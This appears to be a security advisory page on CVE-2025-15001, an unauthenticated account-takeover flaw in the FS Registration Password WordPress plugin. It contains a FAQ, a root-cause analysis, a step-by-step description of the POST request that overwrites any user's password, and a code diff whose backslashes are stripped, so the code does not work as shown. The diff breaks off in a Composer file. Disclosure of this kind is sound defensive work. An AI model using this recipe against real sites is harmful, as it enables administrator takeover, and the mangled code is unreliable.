What is CVE-2025-15001?

CVE-2025-15001 is a critical vulnerability in the FS Registration Password plugin for WordPress, affecting versions up to and including 1.0.1. It allows unauthenticated attackers to change the passwords of any user account, including administrators, leading to complete account takeover.

How does this vulnerability work?

The vulnerability arises from the plugin’s failure to validate user identity when updating passwords. An attacker can send a specially crafted POST request to the registration endpoint, causing the plugin to overwrite an existing user’s password without authentication.

Who is affected by this vulnerability?

Any WordPress site using the FS Registration Password plugin version 1.0.1 or earlier is vulnerable. This includes sites with user accounts, especially those with administrative privileges, as they can be targeted for account takeover.

How can I check if my site is vulnerable?

To determine if your site is affected, check the version of the FS Registration Password plugin installed. If it is version 1.0.1 or earlier, your site is vulnerable and requires immediate action.

How can I fix this vulnerability?

The vulnerability is patched in version 2.0.1 of the FS Registration Password plugin. Update your plugin to this version or later to mitigate the risk associated with CVE-2025-15001.

What if I cannot update the plugin immediately?

If an immediate update is not possible, consider disabling the FS Registration Password plugin until you can upgrade. Additionally, monitor user accounts for unauthorized changes and implement strong password policies.

What does a CVSS score of 9.8 mean?

A CVSS score of 9.8 indicates that the vulnerability is critical, meaning it has a high potential for exploitation with significant impact on confidentiality, integrity, and availability. This level of risk requires urgent attention from site administrators.

What are the practical risks of this vulnerability?

Successful exploitation allows attackers to gain full control over user accounts, including administrators. This can lead to unauthorized access, data breaches, and potential site compromise, affecting the entire WordPress installation.

How does the proof of concept demonstrate the issue?

The proof of concept shows how an attacker can craft a malicious POST request to the registration endpoint, effectively changing the password of an existing user. It illustrates the lack of authentication checks, enabling the attack.

What should I do if I suspect my site has been compromised?

If you suspect that your site has been compromised due to this vulnerability, immediately change passwords for all accounts, especially administrative ones. Conduct a thorough security audit and consider restoring from a clean backup.

Are there any additional security measures I should implement?

In addition to updating plugins, consider implementing two-factor authentication for user accounts, regularly monitoring logs for suspicious activity, and employing security plugins that provide additional layers of protection.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-15001: FS Registration Password <= 1.0.1 – Unauthenticated Privilege Escalation via Account Takeover (registration-password)

CVE ID CVE-2025-15001

Plugin registration-password

Severity Critical (CVSS 9.8)

CWE 639

Vulnerable Version 1.0.1

Patched Version 2.0.1

Disclosed January 4, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-15001:
The FS Registration Password WordPress plugin, versions up to and including 1.0.1, contains an unauthenticated privilege escalation vulnerability. This flaw allows any attacker to reset the password of any user account, including administrators, leading to a complete account takeover. The vulnerability stems from improper identity validation during the password setting process for new user registrations.

Atomic Edge research identifies the root cause in the plugin’s `setUserPassword` function within the `Auth.php` class (registration-password/src/WP/Auth.php). This function hooks into the `random_password` filter. The function checks for the presence of a custom POST parameter `fs_is_password_for_registration` with a value of `’yes’`. If this condition is met, the function returns the raw value from `$_POST[‘pass1’]` as the new user’s password. The critical flaw is the complete absence of any user identity verification. The function does not validate that the user whose password is being set is the same user performing the action, nor does it require any authentication. The filter runs during user creation, but the logic fails to ensure the request is tied to a legitimate, in-progress registration for the target user.

Exploitation involves sending a POST request to the WordPress user registration endpoint, `wp-login.php?action=register`. The attacker must include standard registration parameters (`user_login`, `user_email`, `pass1`) but can set the `user_login` and `user_email` fields to match the credentials of an existing victim account. The attacker must also include the plugin’s trigger parameter `fs_is_password_for_registration=yes`. The WordPress core will process this as a new user registration attempt. Because the target username and email already exist, WordPress will return an error, but the `setUserPassword` filter executes before this error is returned. The filter overwrites the existing user’s hashed password in the database with the attacker-provided `pass1` value, successfully changing the victim’s password without any authentication.

The patch in version 2.0.1 completely rewrites the plugin’s architecture and logic. The vulnerable `Auth.php` class and its `setUserPassword` function are removed. The new implementation in `namespace.php` uses the `wp_pre_insert_user_data` filter instead of `random_password`. The new `set_user_custom_password_for_registration` function adds multiple layers of validation before allowing a password change. It verifies the request is a POST, checks for the presence of `wp-submit=Register`, validates that the submitted `user_login` and `user_email` match the data array passed to the filter (which contains the new user’s data), and crucially, adds a nonce check via `wp_verify_nonce`. This nonce, generated on the registration form, ties the password submission to a specific, legitimate registration session, preventing parameter injection attacks against existing users.

Successful exploitation grants an attacker full control over any user account. Attackers can compromise administrator accounts to install backdoors, modify site content, exfiltrate sensitive data, or delete the website. For multi-site installations, a compromised super administrator can affect the entire network. The vulnerability provides a direct path to site ownership with a CVSS score of 9.8 (Critical), reflecting the trivial attack complexity, lack of privileges required, and high impact on confidentiality, integrity, and availability.

Differential between vulnerable and patched code

Code Diff

--- a/registration-password/fs-registration-password.php
+++ b/registration-password/fs-registration-password.php
@@ -1,25 +1,22 @@
 <?php
 /**
- * Plugin Name: Registration Password
+ * Plugin Name: FS Registration Password
  * Plugin URI: https://github.com/fsylum/fs-registration-password
  * Description: Allow users to set their own password during site registration
- * Version: 1.0.1
+ * Version: 2.0.1
  * Author: Firdaus Zahari
  * Author URI: https://fsylum.net
- * Requires at least: 5.6
- * Requires PHP:      7.3
+ * License: GPLv2 or later
+ * License URI: https://www.gnu.org/licenses/old-licenses/gpl-2.0.html
+ * Tested up to: 6.9
+ * Requires at least: 5.9
+ * Requires PHP: 8.2
  */

-require __DIR__ . '/vendor/autoload.php';
+namespace FsylumRegistrationPassword;

-define('FSRP_PLUGIN_URL', untrailingslashit(plugin_dir_url(__FILE__)));
-define('FSRP_PLUGIN_PATH', untrailingslashit(plugin_dir_path(__FILE__)));
-define('FSRP_PLUGIN_BASENAME', plugin_basename(__FILE__));
-define('FSRP_PLUGIN_VERSION', '1.0.1');
+if ( ! defined( 'ABSPATH' ) ) exit;

-$app = new FsylumRegistrationPasswordApp;
+require __DIR__ . '/inc/namespace.php';

-$app->addService(new FsylumRegistrationPasswordWPAuth);
-
-// Finally run it
-$app->run();
+bootstrap();
--- a/registration-password/inc/namespace.php
+++ b/registration-password/inc/namespace.php
@@ -0,0 +1,162 @@
+<?php
+
+namespace FsylumRegistrationPassword;
+
+
+use WP_Error;
+use WP_User;
+
+if ( ! defined( 'ABSPATH' ) ) exit;
+
+function bootstrap() {
+	add_action('login_enqueue_scripts', __NAMESPACE__ . '\load_user_profile_script');
+	add_action('register_form', __NAMESPACE__ . '\add_password_fields_to_the_registration_page');
+	add_filter('registration_errors', __NAMESPACE__ . '\validate_password_after_submission');
+	add_filter('wp_pre_insert_user_data', __NAMESPACE__ . '\set_user_custom_password_for_registration', 10, 2);
+	add_filter('wp_new_user_notification_email', __NAMESPACE__ . '\modify_new_user_registration_email_message', 10, 2);
+}
+
+/**
+ * Load user-profile script on the registration page.
+ *
+ * @return void
+ */
+function load_user_profile_script(): void {
+	if (!wp_script_is('user-profile')) {
+		wp_enqueue_script('user-profile');
+	}
+}
+
+/**
+ * Add a slightly modified version of password fields on the registration page based on wp-login.php.
+ *
+ * @return void
+ */
+function add_password_fields_to_the_registration_page(): void {
+    wp_nonce_field('fs_registration_password_nonce', 'fs_registration_password_nonce');
+	?>
+    <div class="user-pass1-wrap">
+        <p>
+            <label for="pass1"><?php esc_html_e('Password', 'fs-registration-password'); ?></label>
+        </p>
+
+        <div class="wp-pwd">
+            <input type="password" data-reveal="1" data-pw="<?php echo esc_attr(wp_generate_password(16)); ?>" name="pass1" id="pass1" class="input password-input" size="24" value="" autocomplete="new-password" aria-describedby="pass-strength-result">
+
+            <button type="button" class="button button-secondary wp-hide-pw hide-if-no-js" data-toggle="0" aria-label="<?php esc_attr_e('Hide password', 'fs-registration-password'); ?>">
+                <span class="dashicons dashicons-hidden" aria-hidden="true"></span>
+            </button>
+            <div id="pass-strength-result" class="hide-if-no-js" aria-live="polite"><?php esc_html_e('Strength indicator', 'fs-registration-password'); ?></div>
+        </div>
+        <div class="pw-weak">
+            <input type="checkbox" name="pw_weak" id="pw-weak" class="pw-checkbox">
+            <label for="pw-weak"><?php esc_html_e('Confirm use of weak password', 'fs-registration-password'); ?></label>
+        </div>
+    </div>
+
+    <p class="user-pass2-wrap">
+        <label for="pass2"><?php esc_html_e('Confirm password', 'fs-registration-password'); ?></label>
+        <input type="password" name="pass2" id="pass2" class="input" size="20" value="" autocomplete="new-password" spellcheck="false">
+    </p>
+
+    <p class="description indicator-hint"><?php esc_html(wp_get_password_hint()); ?></p>
+	<?php
+}
+
+/**
+ * Ensure that password is not empty before registering the user.
+ *
+ * @param WP_Error $errors A WP_Error object containing any errors encountered during registration.
+ *
+ * @return WP_Error
+ */
+function validate_password_after_submission(WP_Error $errors): WP_Error {
+    // No verification required as we are only checking for value existence.
+    // phpcs:ignore WordPress.Security.NonceVerification.Missing
+	if (empty($_POST['pass1'])) {
+		$errors->add('empty_password', '<strong>Error</strong>: Please enter your password.');
+	}
+
+	return $errors;
+}
+
+/**
+ * @param array $data The current user data to be inserted
+ * @param bool $update Whether the user is being updated rather than created.
+ *
+ * @return array
+ */
+function set_user_custom_password_for_registration(array $data, bool $update): array {
+	if ($update) {
+		return $data;
+	}
+
+    if (!isset($_SERVER['REQUEST_METHOD'])) {
+        return $data;
+    }
+
+	if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
+		return $data;
+	}
+
+	if ( !isset($_POST['wp-submit'])) {
+		return $data;
+	}
+
+	if ( !isset($_POST['user_login'])) {
+		return $data;
+	}
+
+	if ( !isset($_POST['user_email'])) {
+		return $data;
+	}
+
+	if ( !isset($_POST['pass1'])) {
+		return $data;
+	}
+
+	if ($_POST['user_login'] !== $data['user_login']) {
+		return $data;
+	}
+
+	if ($_POST['user_email'] !== $data['user_email']) {
+		return $data;
+	}
+
+	if ($_POST['wp-submit'] !== 'Register') {
+		return $data;
+	}
+
+	if (!isset($_POST['fs_registration_password_nonce']) ) {
+		return $data;
+	}
+
+	// Intentionally not sanitised because we're validating the nonce.
+	// phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotSanitized
+    if (!wp_verify_nonce(wp_unslash($_POST['fs_registration_password_nonce']), 'fs_registration_password_nonce')) {
+        return $data;
+    }
+
+    // Intentionally not sanitised because we're hashing the raw input.
+    // phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotSanitized
+	$data['user_pass'] = wp_hash_password(wp_unslash($_POST['pass1']));
+
+	return $data;
+}
+
+/**
+ * @param array $wp_new_user_notification_email Current WP mail data
+ * @param WP_User $user User object for new user.
+ *
+ * @return array
+ */
+function modify_new_user_registration_email_message(array $wp_new_user_notification_email, WP_User $user): array {
+	/* translators: %s: The current user's username */
+	$message  = sprintf(__('Username: %s', 'fs-registration-password'), $user->user_login) . "rnrn";
+	$message .= __('You can now log in to the site using the password you've provided during the registration.', 'fs-registration-password') . "rnrn";
+	$message .= wp_login_url() . "rn";
+
+	$wp_new_user_notification_email['message'] = $message;
+
+	return $wp_new_user_notification_email;
+}
--- a/registration-password/src/App.php
+++ b/registration-password/src/App.php
@@ -1,22 +0,0 @@
-<?php
-
-namespace FsylumRegistrationPassword;
-
-use FsylumRegistrationPasswordContractsRunnable;
-
-class App
-{
-    protected $services = [];
-
-    public function addService(Runnable $service)
-    {
-        $this->services[] = $service;
-    }
-
-    public function run()
-    {
-        foreach ($this->services as $service) {
-            $service->run();
-        }
-    }
-}
--- a/registration-password/src/Contracts/Runnable.php
+++ b/registration-password/src/Contracts/Runnable.php
@@ -1,8 +0,0 @@
-<?php
-
-namespace FsylumRegistrationPasswordContracts;
-
-interface Runnable
-{
-    public function run();
-}
--- a/registration-password/src/WP/Auth.php
+++ b/registration-password/src/WP/Auth.php
@@ -1,91 +0,0 @@
-<?php
-
-namespace FsylumRegistrationPasswordWP;
-
-use FsylumRegistrationPasswordContractsRunnable;
-
-class Auth implements Runnable
-{
-    public function run()
-    {
-        add_action('login_enqueue_scripts', [$this, 'loadUserProfileJs']);
-        add_action('register_form', [$this, 'addPasswordFields']);
-        add_filter('registration_errors', [$this, 'validatePassword']);
-        add_filter('random_password', [$this, 'setUserPassword']);
-        add_filter('wp_new_user_notification_email', [$this, 'modifyEmailNotification'], 10, 2);
-    }
-
-    public function loadUserProfileJs()
-    {
-        if (!wp_script_is('user-profile')) {
-            wp_enqueue_script('user-profile');
-        }
-    }
-
-    public function addPasswordFields()
-    {
-        // taken directly from wp-login.php, with slight modification to suit the context
-        ?>
-            <input type="hidden" name="fs_is_password_for_registration" value="yes">
-            <div class="user-pass1-wrap">
-                <p>
-                    <label for="pass1"><?php _e('Password'); ?></label>
-                </p>
-
-                <div class="wp-pwd">
-                    <input type="password" data-reveal="1" data-pw="<?php echo esc_attr(wp_generate_password(16)); ?>" name="pass1" id="pass1" class="input password-input" size="24" value="" autocomplete="off" aria-describedby="pass-strength-result">
-
-                    <button type="button" class="button button-secondary wp-hide-pw hide-if-no-js" data-toggle="0" aria-label="<?php esc_attr_e('Hide password'); ?>">
-                        <span class="dashicons dashicons-hidden" aria-hidden="true"></span>
-                    </button>
-                    <div id="pass-strength-result" class="hide-if-no-js" aria-live="polite"><?php _e('Strength indicator'); ?></div>
-                </div>
-                <div class="pw-weak">
-                    <input type="checkbox" name="pw_weak" id="pw-weak" class="pw-checkbox">
-                    <label for="pw-weak"><?php _e('Confirm use of weak password'); ?></label>
-                </div>
-            </div>
-
-            <p class="user-pass2-wrap">
-                <label for="pass2"><?php _e('Confirm password'); ?></label>
-                <input type="password" name="pass2" id="pass2" class="input" size="20" value="" autocomplete="off">
-            </p>
-
-            <p class="description indicator-hint"><?php echo wp_get_password_hint(); ?></p>
-            <br class="clear">
-        <?php
-    }
-
-    public function validatePassword($errors)
-    {
-        if (empty($_POST['pass1'])) {
-            $errors->add('empty_password', '<strong>Error</strong>: Please enter your password.');
-        }
-
-        return $errors;
-    }
-
-    public function setUserPassword($password)
-    {
-        if (!isset($_POST['fs_is_password_for_registration']) ) {
-            return $password;
-        }
-
-        if (sanitize_text_field($_POST['fs_is_password_for_registration']) !== 'yes') {
-            return $password;
-        }
-
-        return $_POST['pass1'];
-    }
-
-    public function modifyEmailNotification($wp_new_user_notification_email, $user)
-    {
-        $message  = sprintf(__('Username: %s'), $user->user_login) . "rnrn";
-        $message .= __('You can now log in to the site using the password you've provided during the registration.') . "rnrn";
-        $message .= wp_login_url() . "rn";
-
-        $wp_new_user_notification_email['message'] = $message;
-
-        return $wp_new_user_notification_email;
-    }
-}
--- a/registration-password/vendor/autoload.php
+++ b/registration-password/vendor/autoload.php
@@ -1,7 +0,0 @@
-<?php
-
-// autoload.php @generated by Composer
-
-require_once __DIR__ . '/composer/autoload_real.php';
-
-return ComposerAutoloaderInit79e22c08f5c32b16bcd5346f5430b3bc::getLoader();
--- a/registration-password/vendor/composer/ClassLoader.php
+++ b/registration-password/vendor/composer/ClassLoader.php
@@ -1,481 +0,0 @@
-<?php
-
-/*
- * This file is part of Composer.
- *
- * (c) Nils Adermann <naderman@naderman.de>
- *     Jordi Boggiano <j.boggiano@seld.be>
- *
- * For the full copyright and license information, please view the LICENSE
- * file that was distributed with this source code.
- */
-
-namespace ComposerAutoload;
-
-/**
- * ClassLoader implements a PSR-0, PSR-4 and classmap class loader.
- *
- *     $loader = new ComposerAutoloadClassLoader();
- *
- *     // register classes with namespaces
- *     $loader->add('SymfonyComponent', __DIR__.'/component');
- *     $loader->add('Symfony',           __DIR__.'/framework');
- *
- *     // activate the autoloader
- *     $loader->register();
- *
- *     // to enable searching the include path (eg. for PEAR packages)
- *     $loader->setUseIncludePath(true);
- *
- * In this example, if you try to use a class in the SymfonyComponent
- * namespace or one of its children (SymfonyComponentConsole for instance),
- * the autoloader will first look for the class under the component/
- * directory, and it will then fallback to the framework/ directory if not
- * found before giving up.
- *
- * This class is loosely based on the Symfony UniversalClassLoader.
- *
- * @author Fabien Potencier <fabien@symfony.com>
- * @author Jordi Boggiano <j.boggiano@seld.be>
- * @see    https://www.php-fig.org/psr/psr-0/
- * @see    https://www.php-fig.org/psr/psr-4/
- */
-class ClassLoader
-{
-    private $vendorDir;
-
-    // PSR-4
-    private $prefixLengthsPsr4 = array();
-    private $prefixDirsPsr4 = array();
-    private $fallbackDirsPsr4 = array();
-
-    // PSR-0
-    private $prefixesPsr0 = array();
-    private $fallbackDirsPsr0 = array();
-
-    private $useIncludePath = false;
-    private $classMap = array();
-    private $classMapAuthoritative = false;
-    private $missingClasses = array();
-    private $apcuPrefix;
-
-    private static $registeredLoaders = array();
-
-    public function __construct($vendorDir = null)
-    {
-        $this->vendorDir = $vendorDir;
-    }
-
-    public function getPrefixes()
-    {
-        if (!empty($this->prefixesPsr0)) {
-            return call_user_func_array('array_merge', array_values($this->prefixesPsr0));
-        }
-
-        return array();
-    }
-
-    public function getPrefixesPsr4()
-    {
-        return $this->prefixDirsPsr4;
-    }
-
-    public function getFallbackDirs()
-    {
-        return $this->fallbackDirsPsr0;
-    }
-
-    public function getFallbackDirsPsr4()
-    {
-        return $this->fallbackDirsPsr4;
-    }
-
-    public function getClassMap()
-    {
-        return $this->classMap;
-    }
-
-    /**
-     * @param array $classMap Class to filename map
-     */
-    public function addClassMap(array $classMap)
-    {
-        if ($this->classMap) {
-            $this->classMap = array_merge($this->classMap, $classMap);
-        } else {
-            $this->classMap = $classMap;
-        }
-    }
-
-    /**
-     * Registers a set of PSR-0 directories for a given prefix, either
-     * appending or prepending to the ones previously set for this prefix.
-     *
-     * @param string       $prefix  The prefix
-     * @param array|string $paths   The PSR-0 root directories
-     * @param bool         $prepend Whether to prepend the directories
-     */
-    public function add($prefix, $paths, $prepend = false)
-    {
-        if (!$prefix) {
-            if ($prepend) {
-                $this->fallbackDirsPsr0 = array_merge(
-                    (array) $paths,
-                    $this->fallbackDirsPsr0
-                );
-            } else {
-                $this->fallbackDirsPsr0 = array_merge(
-                    $this->fallbackDirsPsr0,
-                    (array) $paths
-                );
-            }
-
-            return;
-        }
-
-        $first = $prefix[0];
-        if (!isset($this->prefixesPsr0[$first][$prefix])) {
-            $this->prefixesPsr0[$first][$prefix] = (array) $paths;
-
-            return;
-        }
-        if ($prepend) {
-            $this->prefixesPsr0[$first][$prefix] = array_merge(
-                (array) $paths,
-                $this->prefixesPsr0[$first][$prefix]
-            );
-        } else {
-            $this->prefixesPsr0[$first][$prefix] = array_merge(
-                $this->prefixesPsr0[$first][$prefix],
-                (array) $paths
-            );
-        }
-    }
-
-    /**
-     * Registers a set of PSR-4 directories for a given namespace, either
-     * appending or prepending to the ones previously set for this namespace.
-     *
-     * @param string       $prefix  The prefix/namespace, with trailing '\'
-     * @param array|string $paths   The PSR-4 base directories
-     * @param bool         $prepend Whether to prepend the directories
-     *
-     * @throws InvalidArgumentException
-     */
-    public function addPsr4($prefix, $paths, $prepend = false)
-    {
-        if (!$prefix) {
-            // Register directories for the root namespace.
-            if ($prepend) {
-                $this->fallbackDirsPsr4 = array_merge(
-                    (array) $paths,
-                    $this->fallbackDirsPsr4
-                );
-            } else {
-                $this->fallbackDirsPsr4 = array_merge(
-                    $this->fallbackDirsPsr4,
-                    (array) $paths
-                );
-            }
-        } elseif (!isset($this->prefixDirsPsr4[$prefix])) {
-            // Register directories for a new namespace.
-            $length = strlen($prefix);
-            if ('\' !== $prefix[$length - 1]) {
-                throw new InvalidArgumentException("A non-empty PSR-4 prefix must end with a namespace separator.");
-            }
-            $this->prefixLengthsPsr4[$prefix[0]][$prefix] = $length;
-            $this->prefixDirsPsr4[$prefix] = (array) $paths;
-        } elseif ($prepend) {
-            // Prepend directories for an already registered namespace.
-            $this->prefixDirsPsr4[$prefix] = array_merge(
-                (array) $paths,
-                $this->prefixDirsPsr4[$prefix]
-            );
-        } else {
-            // Append directories for an already registered namespace.
-            $this->prefixDirsPsr4[$prefix] = array_merge(
-                $this->prefixDirsPsr4[$prefix],
-                (array) $paths
-            );
-        }
-    }
-
-    /**
-     * Registers a set of PSR-0 directories for a given prefix,
-     * replacing any others previously set for this prefix.
-     *
-     * @param string       $prefix The prefix
-     * @param array|string $paths  The PSR-0 base directories
-     */
-    public function set($prefix, $paths)
-    {
-        if (!$prefix) {
-            $this->fallbackDirsPsr0 = (array) $paths;
-        } else {
-            $this->prefixesPsr0[$prefix[0]][$prefix] = (array) $paths;
-        }
-    }
-
-    /**
-     * Registers a set of PSR-4 directories for a given namespace,
-     * replacing any others previously set for this namespace.
-     *
-     * @param string       $prefix The prefix/namespace, with trailing '\'
-     * @param array|string $paths  The PSR-4 base directories
-     *
-     * @throws InvalidArgumentException
-     */
-    public function setPsr4($prefix, $paths)
-    {
-        if (!$prefix) {
-            $this->fallbackDirsPsr4 = (array) $paths;
-        } else {
-            $length = strlen($prefix);
-            if ('\' !== $prefix[$length - 1]) {
-                throw new InvalidArgumentException("A non-empty PSR-4 prefix must end with a namespace separator.");
-            }
-            $this->prefixLengthsPsr4[$prefix[0]][$prefix] = $length;
-            $this->prefixDirsPsr4[$prefix] = (array) $paths;
-        }
-    }
-
-    /**
-     * Turns on searching the include path for class files.
-     *
-     * @param bool $useIncludePath
-     */
-    public function setUseIncludePath($useIncludePath)
-    {
-        $this->useIncludePath = $useIncludePath;
-    }
-
-    /**
-     * Can be used to check if the autoloader uses the include path to check
-     * for classes.
-     *
-     * @return bool
-     */
-    public function getUseIncludePath()
-    {
-        return $this->useIncludePath;
-    }
-
-    /**
-     * Turns off searching the prefix and fallback directories for classes
-     * that have not been registered with the class map.
-     *
-     * @param bool $classMapAuthoritative
-     */
-    public function setClassMapAuthoritative($classMapAuthoritative)
-    {
-        $this->classMapAuthoritative = $classMapAuthoritative;
-    }
-
-    /**
-     * Should class lookup fail if not found in the current class map?
-     *
-     * @return bool
-     */
-    public function isClassMapAuthoritative()
-    {
-        return $this->classMapAuthoritative;
-    }
-
-    /**
-     * APCu prefix to use to cache found/not-found classes, if the extension is enabled.
-     *
-     * @param string|null $apcuPrefix
-     */
-    public function setApcuPrefix($apcuPrefix)
-    {
-        $this->apcuPrefix = function_exists('apcu_fetch') && filter_var(ini_get('apc.enabled'), FILTER_VALIDATE_BOOLEAN) ? $apcuPrefix : null;
-    }
-
-    /**
-     * The APCu prefix in use, or null if APCu caching is not enabled.
-     *
-     * @return string|null
-     */
-    public function getApcuPrefix()
-    {
-        return $this->apcuPrefix;
-    }
-
-    /**
-     * Registers this instance as an autoloader.
-     *
-     * @param bool $prepend Whether to prepend the autoloader or not
-     */
-    public function register($prepend = false)
-    {
-        spl_autoload_register(array($this, 'loadClass'), true, $prepend);
-
-        if (null === $this->vendorDir) {
-            return;
-        }
-
-        if ($prepend) {
-            self::$registeredLoaders = array($this->vendorDir => $this) + self::$registeredLoaders;
-        } else {
-            unset(self::$registeredLoaders[$this->vendorDir]);
-            self::$registeredLoaders[$this->vendorDir] = $this;
-        }
-    }
-
-    /**
-     * Unregisters this instance as an autoloader.
-     */
-    public function unregister()
-    {
-        spl_autoload_unregister(array($this, 'loadClass'));
-
-        if (null !== $this->vendorDir) {
-            unset(self::$registeredLoaders[$this->vendorDir]);
-        }
-    }
-
-    /**
-     * Loads the given class or interface.
-     *
-     * @param  string    $class The name of the class
-     * @return true|null True if loaded, null otherwise
-     */
-    public function loadClass($class)
-    {
-        if ($file = $this->findFile($class)) {
-            includeFile($file);
-
-            return true;
-        }
-
-        return null;
-    }
-
-    /**
-     * Finds the path to the file where the class is defined.
-     *
-     * @param string $class The name of the class
-     *
-     * @return string|false The path if found, false otherwise
-     */
-    public function findFile($class)
-    {
-        // class map lookup
-        if (isset($this->classMap[$class])) {
-            return $this->classMap[$class];
-        }
-        if ($this->classMapAuthoritative || isset($this->missingClasses[$class])) {
-            return false;
-        }
-        if (null !== $this->apcuPrefix) {
-            $file = apcu_fetch($this->apcuPrefix.$class, $hit);
-            if ($hit) {
-                return $file;
-            }
-        }
-
-        $file = $this->findFileWithExtension($class, '.php');
-
-        // Search for Hack files if we are running on HHVM
-        if (false === $file && defined('HHVM_VERSION')) {
-            $file = $this->findFileWithExtension($class, '.hh');
-        }
-
-        if (null !== $this->apcuPrefix) {
-            apcu_add($this->apcuPrefix.$class, $file);
-        }
-
-        if (false === $file) {
-            // Remember that this class does not exist.
-            $this->missingClasses[$class] = true;
-        }
-
-        return $file;
-    }
-
-    /**
-     * Returns the currently registered loaders indexed by their corresponding vendor directories.
-     *
-     * @return self[]
-     */
-    public static function getRegisteredLoaders()
-    {
-        return self::$registeredLoaders;
-    }
-
-    private function findFileWithExtension($class, $ext)
-    {
-        // PSR-4 lookup
-        $logicalPathPsr4 = strtr($class, '\', DIRECTORY_SEPARATOR) . $ext;
-
-        $first = $class[0];
-        if (isset($this->prefixLengthsPsr4[$first])) {
-            $subPath = $class;
-            while (false !== $lastPos = strrpos($subPath, '\')) {
-                $subPath = substr($subPath, 0, $lastPos);
-                $search = $subPath . '\';
-                if (isset($this->prefixDirsPsr4[$search])) {
-                    $pathEnd = DIRECTORY_SEPARATOR . substr($logicalPathPsr4, $lastPos + 1);
-                    foreach ($this->prefixDirsPsr4[$search] as $dir) {
-                        if (file_exists($file = $dir . $pathEnd)) {
-                            return $file;
-                        }
-                    }
-                }
-            }
-        }
-
-        // PSR-4 fallback dirs
-        foreach ($this->fallbackDirsPsr4 as $dir) {
-            if (file_exists($file = $dir . DIRECTORY_SEPARATOR . $logicalPathPsr4)) {
-                return $file;
-            }
-        }
-
-        // PSR-0 lookup
-        if (false !== $pos = strrpos($class, '\')) {
-            // namespaced class name
-            $logicalPathPsr0 = substr($logicalPathPsr4, 0, $pos + 1)
-                . strtr(substr($logicalPathPsr4, $pos + 1), '_', DIRECTORY_SEPARATOR);
-        } else {
-            // PEAR-like class name
-            $logicalPathPsr0 = strtr($class, '_', DIRECTORY_SEPARATOR) . $ext;
-        }
-
-        if (isset($this->prefixesPsr0[$first])) {
-            foreach ($this->prefixesPsr0[$first] as $prefix => $dirs) {
-                if (0 === strpos($class, $prefix)) {
-                    foreach ($dirs as $dir) {
-                        if (file_exists($file = $dir . DIRECTORY_SEPARATOR . $logicalPathPsr0)) {
-                            return $file;
-                        }
-                    }
-                }
-            }
-        }
-
-        // PSR-0 fallback dirs
-        foreach ($this->fallbackDirsPsr0 as $dir) {
-            if (file_exists($file = $dir . DIRECTORY_SEPARATOR . $logicalPathPsr0)) {
-                return $file;
-            }
-        }
-
-        // PSR-0 include paths.
-        if ($this->useIncludePath && $file = stream_resolve_include_path($logicalPathPsr0)) {
-            return $file;
-        }
-
-        return false;
-    }
-}
-
-/**
- * Scope isolated include.
- *
- * Prevents access to $this/self from included files.
- */
-function includeFile($file)
-{
-    include $file;
-}
--- a/registration-password/vendor/composer/InstalledVersions.php
+++ b/registration-password/vendor/composer/InstalledVersions.php
@@ -1,337 +0,0 @@
-<?php
-
-/*
- * This file is part of Composer.
- *
- * (c) Nils Adermann <naderman@naderman.de>
- *     Jordi Boggiano <j.boggiano@seld.be>
- *
- * For the full copyright and license information, please view the LICENSE
- * file that was distributed with this source code.
- */
-
-namespace Composer;
-
-use ComposerAutoloadClassLoader;
-use ComposerSemverVersionParser;
-
-/**
- * This class is copied in every Composer installed project and available to all
- *
- * See also https://getcomposer.org/doc/07-runtime.md#installed-versions
- *
- * To require it's presence, you can require `composer-runtime-api ^2.0`
- */
-class InstalledVersions
-{
-    private static $installed;
-    private static $canGetVendors;
-    private static $installedByVendor = array();
-
-    /**
-     * Returns a list of all package names which are present, either by being installed, replaced or provided
-     *
-     * @return string[]
-     * @psalm-return list<string>
-     */
-    public static function getInstalledPackages()
-    {
-        $packages = array();
-        foreach (self::getInstalled() as $installed) {
-            $packages[] = array_keys($installed['versions']);
-        }
-
-        if (1 === count($packages)) {
-            return $packages[0];
-        }
-
-        return array_keys(array_flip(call_user_func_array('array_merge', $packages)));
-    }
-
-    /**
-     * Returns a list of all package names with a specific type e.g. 'library'
-     *
-     * @param  string   $type
-     * @return string[]
-     * @psalm-return list<string>
-     */
-    public static function getInstalledPackagesByType($type)
-    {
-        $packagesByType = array();
-
-        foreach (self::getInstalled() as $installed) {
-            foreach ($installed['versions'] as $name => $package) {
-                if (isset($package['type']) && $package['type'] === $type) {
-                    $packagesByType[] = $name;
-                }
-            }
-        }
-
-        return $packagesByType;
-    }
-
-    /**
-     * Checks whether the given package is installed
-     *
-     * This also returns true if the package name is provided or replaced by another package
-     *
-     * @param  string $packageName
-     * @param  bool   $includeDevRequirements
-     * @return bool
-     */
-    public static function isInstalled($packageName, $includeDevRequirements = true)
-    {
-        foreach (self::getInstalled() as $installed) {
-            if (isset($installed['versions'][$packageName])) {
-                return $includeDevRequirements || empty($installed['versions'][$packageName]['dev_requirement']);
-            }
-        }
-
-        return false;
-    }
-
-    /**
-     * Checks whether the given package satisfies a version constraint
-     *
-     * e.g. If you want to know whether version 2.3+ of package foo/bar is installed, you would call:
-     *
-     *   ComposerInstalledVersions::satisfies(new VersionParser, 'foo/bar', '^2.3')
-     *
-     * @param  VersionParser $parser      Install composer/semver to have access to this class and functionality
-     * @param  string        $packageName
-     * @param  string|null   $constraint  A version constraint to check for, if you pass one you have to make sure composer/semver is required by your package
-     * @return bool
-     */
-    public static function satisfies(VersionParser $parser, $packageName, $constraint)
-    {
-        $constraint = $parser->parseConstraints($constraint);
-        $provided = $parser->parseConstraints(self::getVersionRanges($packageName));
-
-        return $provided->matches($constraint);
-    }
-
-    /**
-     * Returns a version constraint representing all the range(s) which are installed for a given package
-     *
-     * It is easier to use this via isInstalled() with the $constraint argument if you need to check
-     * whether a given version of a package is installed, and not just whether it exists
-     *
-     * @param  string $packageName
-     * @return string Version constraint usable with composer/semver
-     */
-    public static function getVersionRanges($packageName)
-    {
-        foreach (self::getInstalled() as $installed) {
-            if (!isset($installed['versions'][$packageName])) {
-                continue;
-            }
-
-            $ranges = array();
-            if (isset($installed['versions'][$packageName]['pretty_version'])) {
-                $ranges[] = $installed['versions'][$packageName]['pretty_version'];
-            }
-            if (array_key_exists('aliases', $installed['versions'][$packageName])) {
-                $ranges = array_merge($ranges, $installed['versions'][$packageName]['aliases']);
-            }
